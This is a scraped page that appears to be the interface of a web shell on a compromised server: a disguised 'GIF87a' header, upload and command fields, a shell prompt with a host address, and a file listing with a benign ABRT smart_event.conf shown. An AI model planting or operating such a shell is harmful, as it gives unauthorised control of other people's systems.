GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@160.79.109.167: ~ $
# Access to /dev/sda usually requires root.
# skdump is usually in /usr/sbin.
# Therefore we run it as post-create event, thus: under root.
#
# The code is identical for all three packages.
#
# To be moved to the packages, so that it is (de)installed
# together with these packages.

EVENT=post-create component=gnome-disk-utility
        which skdump >/dev/null 2>&1 || exit 0
        for f in /dev/[sh]d[a-z]; do
            test -e "$f" || continue
            skdump "$f"
            echo
        done >smart_data

EVENT=post-create component=libatasmart
        which skdump >/dev/null 2>&1 || exit 0
        for f in /dev/[sh]d[a-z]; do
            test -e "$f" || continue
            skdump "$f"
            echo
        done >smart_data

EVENT=post-create component=udisks
        which skdump >/dev/null 2>&1 || exit 0
        for f in /dev/[sh]d[a-z]; do
            test -e "$f" || continue
            skdump "$f"
            echo
        done >smart_data

Filemanager

Name Type Size Permission Actions
abrt_event.conf File 4.85 KB 0644
ccpp_event.conf File 4.7 KB 0644
ccpp_retrace_event.conf File 153 B 0644
centos_report_event.conf File 1.84 KB 0644
gconf_event.conf File 476 B 0644
koops_event.conf File 1.61 KB 0644
mailx_event.conf File 203 B 0644
mdadm_event.conf File 157 B 0644
python_event.conf File 1.19 KB 0644
rhtsupport_event.conf File 243 B 0644
smart_event.conf File 969 B 0644
vimrc_event.conf File 1.44 KB 0644
vmcore_event.conf File 2.32 KB 0644
xorg_event.conf File 974 B 0644